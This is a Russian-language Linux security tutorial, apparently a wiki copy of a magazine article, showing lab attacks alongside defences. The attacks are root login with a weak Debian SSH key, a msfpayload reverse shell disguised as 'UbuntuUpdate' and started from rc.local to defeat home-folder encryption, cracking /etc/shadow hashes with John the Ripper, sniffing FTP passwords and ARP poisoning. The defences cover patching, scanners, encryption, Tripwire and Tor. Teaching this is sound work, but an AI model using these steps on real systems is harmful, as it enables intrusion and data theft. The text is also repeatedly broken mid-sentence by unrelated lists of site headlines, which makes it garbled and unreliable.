Все возможные пары ключей доступны на www.digitaloffense.net/tools/debian-openssl/. Воспользуемся ссылкой под именем SSH 2048-bit RSA Keys X86 (48.0M). Разархивируем этот файл, открыв терминал и выполнив
tar xjf debian debian_ssh_rsa_2048_x86.tar.bz2
а затем перейти в новый каталог командой:
cd rsa/2048
Сейчас в этом каталоге содержатся все пары ключей, которые выдает дефектный генератор ключей от Debian. Чтобы найти нужную, введите:
grep -li AAAAB3NzaC1yc2EAAAA BIwAAAQEApmGJFZNL0ibMNAL *.pub
где
AAAAB3NzaC1yc2EAAAABI wAAAQEApmGJFZNL0ibMNAL
– первая часть открытого ключа, который мы нашли на сервере: так как возможных ключей немного, весь вводить необязательно. Команда обнаружит один файл ключа:
57c3115d77c5639o332dc5c49978627 a-5429.pub
Сейчас с помощью команды
ssh -i ~/rsa/2048/ 57c3115d77c5639o332dc 5c49978627a-5429 root@192.168.56.102
где
192.168.56.102
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
– это IP-адрес сервера Metasploitable, можно войти на сервер, причем у вас будет доступ root, и вы сможете производить любые действия или красть любые данные.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
[править] Защитите себя
Если ограничить число служб, доступных на вашем сервере, только насущно необходимыми, безопасность возрастет. Например, если вы запустили только HTTP, SSH и SFTP, но не Telnet и FTP, вы тем самым снизили на 40 % количество потенциально уязвимых сервисов по сравнению с ситуацией, когда работают все пять, не уменьшив объем возможностей, доступных для пользователей. Чтобы провести атаку, мы использовали известные атаки на устаревшие программы, и ключ к самозащите – всегда применять заплатки безопасности. Плюс к тому, можно проверять компьютеры на предмет известных дыр безопасности с помощью сканеров уязвимостей, например Nessus (www.nessus.org). Nessus – коммерческая программа, но для домашнего использования бесплатна. После установки вам потребуется зарегистрироваться на сайте. На почту вам вышлют ключ вместе с инструкцией, как активировать программу и добавить пользователя. После этого вы получите доступ к программе через web-интерфейс на http://localhost:8834.
Заплатки безопасности и сканеры защитят вас только от известных уязвимостей. Атаки Zero-day – Дня Нуль – те, что происходят до того, как сообщество заметит и исправит уязвимость. Против них обороняться гораздо сложнее.
Максимально защитив свое ПО, можно заодно настроить систему на отслеживание подозрительной активности. Система предотвращения вторжений в сеть [Network Intrusion Prevention System, NIPS], поодобная Snort, следит за сетевой активностью и докладывает о необычных подключениях. Мы тестировали ее, запустив сканирование в атаке, описанной выше, на Security Onion (дистрибутив, в котором Snort установлена по умолчанию), и она зарегистрировала 278 событий, касающихся безопасности. Если запустить систему, подобную этой, и следить за необычными событиями, вы сможете распознать потенциальные атаки до их начала.
Одна из двух наших атак производилась против web-приложения (TikiWiki) – такой тип программ очень популярен у хакеров. В них полно дыр безопасности, многие из которых обязаны плохой проверке в полях ввода, что позволяет взломщикам выполнять произвольный код. В случае web-приложений использовать самые последние версии еще важнее, так как если уязвимость известна, то провести атаку – пара пустяков.
[править] Атакуем персональный компьютер
С точки зрения хакера, главное отличие персонального компьютера от сервера в том, что у сервера открыто множество портов (например, http или FTP), а у настольной системы – нет. Это означает, что при атаке настольного компьютера приходится применять другой подход. Получив физический доступ к компьютеру, извлечь из него данные просто. Простейший способ – вставить live-дистрибутив в CD-привод или порт USB, загрузиться и примонтировать жесткий диск. Это даст вам абсолютный контроль над всем жестким диском. Но если пользователь заботится о безопасности и зашифровал диск, целиком или частично, то задача усложняется.
В некоторых дистрибутивах (например, Ubuntu) у пользователя есть возможность зашифровать свой домашний каталог. То есть если вы загрузитесь с live-дистрибутива, в корневом разделе вы увидите общие данные, но не файлы пользователя. До сих пор еще неизвестны взломы современных алгоритмов шифрования, но это не значит, что у нас нет возможности проникнуть к данным; задача просто становится более хитрой. Сейчас мы приведем на компьютер троянского коня, что позволит нам получить доступ к файлам после того, как пользователь примонтирует раздел.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Это можно попытаться проделать с использованием VirtualBox. Наши шаги работают с Ubuntu в качестве дистрибутива-жертвы, и BackTrack – дистрибутива хакера, но можете взять и другие, если в них есть соответствующие возможности. У жертвы должен быть зашифрованный домашний каталог, а атакующей системе требуется Metasploit Framework. Сначала создайте виртуальную машину с установленной последней версией Ubuntu и позаботьтесь, чтобы на этапе создания пользователя было выбрано Encrypt My Home Folder. Сетевой адаптер машины должен быть установлен Host-only.
Установив операционную систему и запустив виртуальную машину, зайдите в Devices > CD/DVD Devices, убедитесь, что Ubuntu install CD не выбран, а вместо него выберите BackTrack ISO. Перезагрузите систему. BackTrack поведет себя тем же образом, что live CD на компьютере с установленным Ubuntu. На странице Boot Options нажмите ввод, чтобы выбрать BackTrack Text – Default Boot Text Mode. По умолчанию вход в систему будет под пользователем root в текстовом окружении. Чтобы запустить рабочий стол, введите:
startx
Нам нужно примонтировать диск с Ubuntu, так что откройте терминал (Ctrl+Alt+T) и введите команду
mkdir /mnt/victim
mount /dev/sda1 /mnt/victim
Сейчас вы можете перемещаться по жесткому диску, но при попытке зайти в домашний каталог вы увидите только лишь текстовый файл, где говорится, что содержимое каталога зашифровано.
Настройте атакующий компьютер тем же способом, что было проделано при атаке сервера. Для определения IP-адреса запустите ifconfig.
На машине-жертве создайте троянского коня – в нашем случае это обратная tcp оболочка [reverse tcp shell] – с помощью msfpayload, введя
msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 X > /mnt/victim/bin/UbuntuUpdate
где 192.168.56.101 – IP-адрес атакующей машины. Эта команда создает исполняемый файл под названием UbuntuUpdate (название выглядит безобидно, и у пользователя не возникнет подозрений, когда он увидит ее в списке процессов), которая подключится к атакующей машине на порт 443. Сделаем ее исполняемой:
chmod +x /mnt/victim/bin/UbuntuUpdate
Теперь нам нужно ее запустить. В вашем текстовом редакторе добавьте в файл /mnt/victim/etc/rc.local строку
/bin/UbuntuUpdate
непосредственно перед строкой
exit 0
Этот файл выполняется при каждой загрузке компьютера. Подготовив компьютер жертвы, настроим атакующий компьютер на прослушивание соединения. Откройте на нем терминал и введите
msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 E
Чтобы начать атаку, перезагрузите компьютер-жертву без live CD (в меню виртуальной машины зайдите в Devices > CD/DVD Devices и снимите галочку у BackTrack CD). Как только вы попадаете на экран входа, возникает связь со взломщиком. В терминале, где был запущен msfcli, вы должны получить доступ к компьютеру-жертве (приглашения командной строки нет). Если ввести команду whoami, вы в ответ получите root.
Так как rc.local запущен с правами суперпользователя, это отражается на нашем удаленном сеансе. Из удаленного терминала мы сможет обозревать файлы, добавлять пользователей и делать все, что нам заблагорассудится. Однако нам не удастся примонтировать домашний каталог, не зная пароля пользователя, так что следует подождать, пока пользователь не войдет в систему. Как только пользователь введет свой пароль на компьютере-жертве, система примонтирует зашифрованный том, и мы сможем обозревать, редактировать или удалять файлы, как будто их и не шифровали.
[править] Установка пароля BIOS
Можно предотвратить загрузку машины с live-дистрибутивом, удалив опции CD и USB из списка загрузки в BIOS, а затем установив пароль BIOS, чтобы взломщик не смог вернуть их обратно. Более целенаправленный взломщик, тем не менее, способен вытащить привод из компьютера и подключить его к другому, где он сможет его примонтировать. Единственный способ полностью оградить себя от атаки такого вида – зашифровать жесткий диск целиком и задать хороший пароль.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Большинство основных дистрибутивов поддерживают полное шифрование диска. Включение его при установке обычно достигается выбором опции Encrypted LVM на стадии разбивки диска. Пользователям Ubuntu придется для этого использовать альтернативный установочный CD, поскольку в обычной установке данная опция не поддерживается. Надо это вам или нет, зависит от вероятности попадания компьютера в руки взломщика и ценности информация на нем. Как правило, ноутбуки уязвимее настольных компьютеров, ведь их теряют и крадут намного чаще.
В нашем примере мы показали, как взломщик может установить троянского коня; однако он может достигнуть того же эффекта, хитростью заставив пользователя запустить программу. Троян может быть даже включен в файл DEB или RPM, или другие программы. Лучший способ защитить себя от такой атаки – запускать программы только из надежных, проверенных источников: например, из официальных репозиториев вашего дистрибутива. Эти источники должны содержать криптографическую подпись, для гарантии, что содержимое никем извне не менялось. Съемные носители, типа USB-брелков, могут содержать код, автоматически выполняемый при подключении носителя, однако Linux должен всегда выдавать запрос на подтверждение, прежде чем запустить программу. Если вы не уверены, что этот код законный, не запускайте его.
Утилита Tripwire может проверять, какие файлы в системе изменены. При первом запуске она создает базу данных из хэшей всех файлов системы, и затем пользователь может запустить ее в любое время и узнать, какие файлы менялись. Она не может сообщить, почему они были изменены (например, было ли это настоящее обновление, или не загрузил ли взломщик вредоносный код) – распознавание этого уже перекладывается на плечи пользователя. При использовании флага -P база данных подписывается определенной фразой-паролем. Если этого не сделать, взломщик сможет перезаписать базу данных хэшами измененных файлов.
[править] Выбор пароля
При неограниченном числе попыток можно подобрать любой пароль, однако хороший пароль подбирать настолько долго, что ко времени, когда взломщик его найдет, это утратит важность. Например, если перебирать 100 паролей в секунду, зная, что пароль – слово из словаря (Oxford English Dictionary содержит около 200 000 слов), то на отыскание пароля потребуется 2000 секунд, или 33 минуты.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Очевидно, нам хочется, чтобы наш пароль сопротивлялся дольше – значит, нужно быть менее предсказуемым. Если пароль – случайная строка символов, то число возможных комбинаций – это число возможных символов в степени их количества. Например, пятисимвольная строка из букв в нижнем регистре (26 вариантов) может быть любой из 26 * 26 * 26 * 26 * 26 = 11881376 возможных комбинаций. При той же скорости перебора это займет 118,814 секунд, или 33 часа.
Каждый добавленный к паролю символ увеличит время перебора в 26 раз, то есть случайный пароль из шести букв в нижнем регистре нужно подбирать 35 дней, а семисимвольный – два с половиной года. Конечно, здесь предполагается, что скорость перебора – 100 проверок в секунду, а в действительности она может быть намного больше, или меньше, в зависимости от системы. John The Ripper [Джон-потрошитель, – прим. пер.] – это утилита взлома паролей, которая монтирует словарные атаки на хэши паролей. Обычно она поставляется в пакете под названием John, и доступна на www.openwall.com/john/. Чтобы понять, насколько быстро вы можете взламывать пароли, запустите эталонный тест, введя
john --test
Это та скорость, при которой вы сможете взломать пароли, когда у вас есть хэши; атака грубой силы по сети будет намного медленнее.
Вместо того, чтобы увеличивать длину пароля, вы можете расширить количество используемых символов. Например, строка из пяти символов, содержащая цифры и буквы в обоих регистрах, может принимать любую из 62 * 62 * 62 * 62 * 62 возможностей, то есть где-то 92 000 000 штук. При той же скорости перебора это займет 916132 секунд, или 10,6 дней, а шести- и семисимвольный пароли – 1,8 и 112 лет, соответственно.
Проблема с трудновзламываемыми паролями обычно в том, что их, как правило, очень сложно запоминать. Одно из решений, предложенное Рэнделлом Манро [Randall Munroe] на xkcd.com – использование многословных паролей, например, несколько не связанных логически слов в нижнем регистре, стоящих вместе. В предположении, что взломщик знает структуру слов, пароль можно рассматривать как строку из четырех «символов», где каждый «символ» представляет собой слово. Если ограничиться двумя тысячами расхожих слов, то число потенциальных паролей равно 2000 * 2000 * 2000 * 2000, то есть 16 триллионов, взломать которые при тех же условиях займет 160 миллиардов секунд, или 5073 года. Пароль cameratrainingrassminister столь же безопасен, как и 5Hjs9gE, но запомнить его гораздо проще.
Один из способов узнать, насколько безопасен ваш пароль – попытаться взломать его с помощью John The Ripper. Сначала запустите unshadow, чтобы сочетать /etc/passwd, содержащий детали учетной записи пользователя, с /etc/shadow, который хранит хэши паролей.
sudo unshadow /etc/passwd /etc/shadow > hashes
Затем с помощью
john hashes
запустите John The Ripper.
Если у вас появилось сообщение, что в файле не обнаружено хэшей, значит, вы используете старую версию John The Ripper, и вам нужно взять с сайта новую. Программа попытается взломать все пароли в системе, и вы можете проверить, легко ли подобрать пароль пользователя. Если ваш пароль достаточно сложен, эта команда никогда не прекратит работу; она будет пытаться подобрать пароль днями, ночами, неделями и даже годами, пока не найдет; или, нажав Ctrl+C, вы прекратите ее работу. Эта утилита – для web-разработчиков, и вам потребуется некоторое знание HTTP, HTML и SQL, чтобы закончить упражнения.
[править] Атака сети
Когда вы храните информацию на информацию на компьютере, вы можете ею управлять, устанавливать права доступа и записывать, какой именно пользователь произвел изменение данных. Однако как только информация покидает компьютер и путешествует по сети, вы теряете этот контроль.
Сети – это открытые системы; компьютеры могут к ним подключаться и отключаться от них, и основные сетевые протоколы в своем дизайне поставили простоту превыше безопасности. Взломщик может использовать эту слабую сторону, чтобы надергать данных и даже управлять тем, что вы посылаете и получаете. Простейший способ это сделать – прослушивать данные, которые перемещаются по сети. Одна из самых универсальных утилит для анализа сетевого трафика [sniffer] – WireShark. После установки (либо через менеджер пакетов вашего дистрибутива, либо взяв файлы с www.wireshark.org), ее можно запустить командой
sudo wireshark
Щелкните по Pseudo-device, который перехватывает все интерфейсы, чтобы начать получение пакетов из сети (включая те, что посылаются компьютером, где запущена программа). Если хоть что-то посылает данные, вы увидите целый поток информации о пакетах. Чтобы выделить нужную вам информацию, настройте фильтр. Например, фильтр
http.request.uri
отобразит все пакеты с информацией об HTTP-запросах, а
ftp.request.command contains “USER”
или
ftp.request.command contains “PASS”
выберет все имена пользователей и паролей для FTP. Поскольку протокол FTP посылает эту информацию незашифрованной, вы можете просто считать детали входа из столбца Info. Чтобы испытать это, можно просто подключиться к FTP-серверу, или скачать пробный перехват iseries.cap из wiki.wireshark.org/SampleCaptures.
Однако, в зависимости от настроек сети, вы можете обнаружить, что прослушивать вам особенно нечего. Дело в том, что большинство современных сетевых концентраторов являются коммутаторами, то есть посылают данные только тому компьютеру, которому эти данные адресованы. Чтобы обойти это, взломщик может обдурить протокол разрешения адресов (Address Resolution Protocol, ARP). Все прочие компьютеры в сети будут наивно посылать свою информацию взломщику, а тот затем перенаправит ее истинному адресату. Это можно протестировать на вашей сети (или той сети, где у вас есть разрешение на атаку) с помощью Ettercap-NG (ettercap.sourceforge.net).
Запустите графический интерфейс, введя
sudo ettercap -G
Затем перейдите к Sniff > Unified sniffing и выберите сетевой интерфейс. Для успешного отравления [poisoning] таблиц ARP вам нужно знать, какие компьютеры присутствуют в сети, так что зайдите в Hosts > Scan For Hosts. Чтобы начать атаку, нажмите MITM > ARP Poisoning, а затем OK. Сейчас все подготовлено; перейдите в Start > Start Sniffing. После запуска идите в Hosts > Host List и выделите каждую жертву. Нажмите Add to Target 1.
Можете запускать arp на машинах-жертвах. Если отравление ARP сработало, все IP-адреса будут указывать на один и тот же MAC-адрес.
- Метамодернизм в позднем творчестве В.Г. Сорокина
- ЛитРПГ - последняя отрыжка постмодерна
- "Ричард III и семиотика"
- 3D-визуализация обложки Ridero создаем обложку книги при работе над самиздатом.
- Архитектура метамодерна - говоря о современном искусстве, невозможно не поговорить об архитектуре. В данной статье будет отмечено несколько интересных принципов, характерных для построек "новой волны", столь притягательных и скандальных.
- Литература
- Метамодерн
- Рокер-Прометей против изначального зла в «Песне про советскую милицию» Вени Дркина, Автор: Нина Ищенко, к.ф.н, член Союза Писателей ЛНР - перепубликация из журнала "Топос".
- Как избавиться от комаров? Лучшие типы ловушек.
- Что делать если роблокс вылетает на windows
- Что делать, если ребенок смотрит порно?
- Почему собака прыгает на людей при встрече?
- Какое масло лить в Задний дифференциал (мост) Visco diff 38434AA050
- О чем может рассказать хвост вашей кошки?
- Верветки
- Отчетность бюджетных учреждений при закупках по Закону № 223-ФЗ
- Срок исковой давности как правильно рассчитать
- Дмитрий Патрушев минсельхоз будет ли преемником Путина
- Кто такой Владислав Поздняков? Что такое "Мужское Государство" и почему его признали экстремистским в России?
- Как правильно выбрать машинное масло в Димитровграде?
- Как стать богатым и знаменитым в России?
- Почему фильм "Пипец" (Kick-Ass) стал популярен по всему миру?
- Как стать мудрецом?
- Как правильно установить FreeBSD
- Как стать таким как Путин?
- Где лучше жить - в Димитровграде или в Ульяновске?
- Почему город Димитровград так называется?
- Что такое метамодерн?
- ВАЖНО! Временное ограничение движения автотранспортных средств в Димитровграде
- Тарифы на электроэнергию для майнеров предложено повысить
Сейчас вы должны обнаружить, что через WireShark проходит больше информации. Вы можете даже использовать Ettercap, чтобы управлять сетью. Например, зайдя в View > Connections, вы увидите все TCP- и UDP-соединения в сети. Вы можете разорвать любое из них, выделив его и нажав Kill Connection.
[править] Безопасные протоколы
Чтобы защитить себя при соединении по сети, позаботьтесь об использовании безопасных протоколов. Например, используйте SSH вместо Telnet (флаг -2 гарантирует, что используется версия 2 протокола SSH) и SFTP вместо FTP. Когда дело дойдет до обзора Интернета, вы будете ограничены той защищенностью, что предлагает web-сервер. Некоторые сайты доступны по защищенному протоколу HTTPS, тогда как другие доступны по простому HTTP. Чтобы помочь вам держать обзор сети вдали от любопытных глаз, Electronic Frontier Foundation выпустил модуль расширения для Firefox под названием HTTPS Everywhere (www.eff.org/https-everywhere). Он не повышает уровень защищенности до уровня HTTPS, но зато вынуждает использовать безопасный протокол, если сайт его поддерживает.
Такие формы шифрования не позволят прослушивающему считать какие-либо ваши данные, но могут подсказать ему, какие компьютеры соединены друг с другом. Если использовать Tor (www.torproject.org), то можно помешать взломщику завладеть и этой информацией. Простейший способ – взять тамошний Browser Bundle. Чтобы сделать обзор Интернета анонимным, просто скачайте, распакуйте и запустите start_tor_browser. При этом вы подключитесь к сети Tor (это набор подставных серверов, разбросанных по всему свету), затем откроете web-браузер. При входе в Интернет через эту программу данные будут безопасно перетасованы по целой цепочке компьютеров, и любому прослушивающему будет невозможно понять, какие сайты вы посещаете.
Вдобавок к web-браузерам, usewithtor позволяет и другим программам взаимодействовать по сети Tor. Подробности того, какие программы будут работать с этой системой – на сайте Tor (https://trac.torproject.org/projects/tor/wiki/doc/TorifyHOWTO). Защитить себя от ARP-«надувательства» [spoofing, подмена MAC-адреса] можно нескольким разными способами. Если запустить arpwatch или arpalert, то все подозрительные случаи будут отражены в системных журналах, тогда как ArpON попытается остановить атаку.